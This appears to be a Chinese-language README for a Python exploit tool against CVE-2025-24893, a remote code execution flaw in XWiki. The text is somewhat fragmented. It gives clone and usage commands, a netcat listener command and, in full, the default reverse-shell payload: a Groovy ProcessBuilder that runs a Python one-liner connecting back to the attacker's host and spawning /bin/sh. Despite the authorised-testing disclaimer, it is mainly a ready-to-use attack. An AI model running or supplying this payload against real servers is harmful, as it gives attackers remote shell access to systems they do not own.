
Modified exploit for CVE-2025-24893
一个简单的 Python3 脚本,用于利用 CVE-2025-24893(XWiki 平台中的一个远程代码执行漏洞),使用基于 Groovy 的异步宏和可配置的反向 Shell 载荷。
⚠️ 警告: 该工具仅供教育和授权测试目的使用。未经授权针对您不拥有或未经明确许可测试的系统使用是非法且不道德的。
ProcessBuilder 片段以避免 Runtime.exec 的怪异行为requests 库pip install requests
克隆此仓库:
git clone https://github.com/hackersonsteroids/cve-2025-24893.git
cd cve-2025-24893
./exploit.py <TARGET_DOMAIN> <LHOST> <LPORT>
<TARGET_DOMAIN>
XWiki 主机(例如 wiki.example.local)。
<LHOST>
攻击者计算机的 IP(监听器运行的位置)。
<LPORT>
监听器端口(整数)。
nc -lvnp 4444
./exploit.py wiki.vulnerable.local 10.0.0.5 4444
netcat 监听器以获取 Shell。在发送载荷之前,脚本执行以下操作:
https://<TARGET_DOMAIN>http://<TARGET_DOMAIN>这有助于确保与混合协议部署的兼容性。
默认情况下,脚本使用一个 Python3 单行代码:
new ProcessBuilder(
['/bin/bash','-c',
'python3 -c \'import socket,subprocess,os;'
's=socket.socket();s.connect(("LHOST",LPORT));'
'os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);'
'os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])\'']
).redirectErrorStream(true).start()
build_payload() 函数。本项目采用 MIT 许可证。详情请参阅 LICENSE 文件。
该工具仅供授权安全评估和教育目的使用。作者对滥用不承担任何责任。在测试任何目标系统之前,务必获得明确许可。